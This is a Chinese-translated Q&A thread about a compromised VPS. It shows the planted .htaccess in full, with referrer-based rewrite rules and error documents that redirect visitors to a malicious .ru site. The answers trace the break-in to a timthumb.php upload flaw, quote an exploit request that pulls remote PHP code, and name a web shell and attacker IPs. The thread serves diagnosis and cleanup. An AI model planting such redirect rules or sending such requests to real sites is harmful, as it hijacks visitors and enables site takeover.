可能重复:
我的服务器被黑了 紧急求助
所以我很恐慌。
我正在构建一个 Rails 应用程序,它托管在 VPS 上,用于暂存环境。我本月早些时候对其进行了配置,一切运行正常(特别是使用 capistrano 部署)。今天,我将最新的开发代码部署到 Web 服务器并进行测试。我点击了 URL (http://openstudyr.ashleyangell.com),并注意到它正在对“http://guide-securesoft.ru/fliht/index.php?1314066061' 我以前从未听说过,并且点击我的任何链接也是如此(最终重定向到相同/相似的 URL)。
我不擅长 Linux,但我足够聪明,可以确保我的所有 SSH 都是通过密钥认证完成的,我从不以 root 身份运行,并且 root 密码是长度约为 24 个字符的字母数字字符串。
我检查了虚拟主机的 Apache 配置,但它与我离开时的配置完全一样。
我感觉我的心脏快要跳出胸膛爆炸了。我不知道该做什么,也不知道下一步该检查什么。
我尝试通过 Google 搜索该域名来查看是否存在类似的问题,但没有找到任何明显的结果。
有谁能帮忙吗?我该如何 a) 验证我是否受到了攻击,以及 b) 修复问题并阻止其发生(我知道在 a 被修复之前无法真正回答这个问题)。
:(
更新 #1:
似乎我的所有 URL 在从浏览器执行时都会执行自动重定向,但如果我直接点击 URL,它们就会正常工作。很奇怪。
更新 #2:
它也是父域http://ashleyangell.com(我的个人博客)也遇到了同样的问题。但是,其他虚拟主机似乎都没有受到影响。
更新 #3:
我在其他机器上进行了测试。它们都表现出了相同的行为,这让我认为它并不局限于我的开发机器或互联网连接。(是吗?)
更新 #4:
我运行后发现sudo grep -ri -l "guide-securesoft" /var,服务器上的所有 .htaccess 文件都匹配!因此,我选择了有问题的域名并运行cat /var/www/vhosts/openstudyr.ashleyangell.com/.htaccess,结果如下(我对其进行了清理,使其更易于阅读):
ErrorDocument 400 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 401 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 403 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 404 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 500 http://guide-securesoft.ru/fliht/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://guide-securesoft.ru/fliht/index.php [R=301,L]
</IfModule>
...所以至少现在我知道他们是怎么做的——但我怎样才能阻止它再次发生呢?
答案1
看起来下面的所有内容/wp-content/都引发了 301 重定向。在那里查找可能的恶意.htaccess文件 - 可能是被入侵的帐户或 WordPress 中允许上传的漏洞(确保您的 WP 已完全更新)。
除此之外,根据攻击媒介的不同,系统可能受到更多方面的损害;传统观点是摧毁系统,恢复到损害之前的备份。违规行为可能仅限于他们能够做的事情/wp-content/,如果您没有好的备份恢复选项,那么清理它可能就足够了,但除非您能确定违规的来源,否则您可能没有完全清理干净。
看这里对于下一步该做什么进行了一些精彩的讨论和回答 - 祝你好运!
答案2
我们的 wordpress 安装也遇到了同样的问题;谢谢指点。有人注意到 .php 页面重定向到http://securesoft-trip.ru/attention/index.php?rf=或类似命令,我使用“find / wordpress_dir/ -exec grep “securesoft” {} /dev/null\;”找到了有问题的 .htaccess 文件。该文件最近已被修改。
搜索过去几天在我的 wordpress 中修改的内容(查找 wordpress_dir/-mtime -3),在我们的一个主题的根目录中找到了“script_new3.php”(类 PHPMailer)和“wp.php”(#Web Shell by oRb)。
我拥有很久以前的 access_logs,因此查看了这些文件生成的时间以及 IP。第一次出现 wp.php 时的 IP“216.246.79.192 - “GET themes/*/wp.php HTTP/1.0” 200 31311”与 1 秒前对主题中的“thumb.php”的 POST 请求之间存在联系。(几周前有很多垃圾搜索也搜索“timthumb.php”和“thumb.php”)
经过一番寻找,我发现了这个允许文件上传的漏洞,http://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/显然,我们的几个旧 WooThemes 中有一个错误版本。我看到一个“GET /*/thumb.php?src=http://bloggeracom.cu.cc/1.phpHTTP/1.1” 400 117 可以做到这一点。
这里有一些需要查找的 IP,它们对提到的任一文件执行了 POST/GET 操作(216.246.79.192 - 代理、92.63.104.30、94.45.130.238、91.193.165.188)。